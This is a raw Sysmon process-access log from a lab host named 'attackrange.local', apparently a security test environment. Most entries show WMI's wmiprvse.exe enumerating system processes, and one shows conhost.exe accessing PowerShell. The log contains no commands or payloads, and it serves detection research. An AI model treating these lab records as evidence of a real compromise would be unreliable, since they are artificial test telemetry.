16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C7AA-00000000AD01}12492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C7AA-00000000AD01}12492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.174{05ADC7E1-6DD2-603E-C7AA-00000000AD01}124929784C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.173{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RP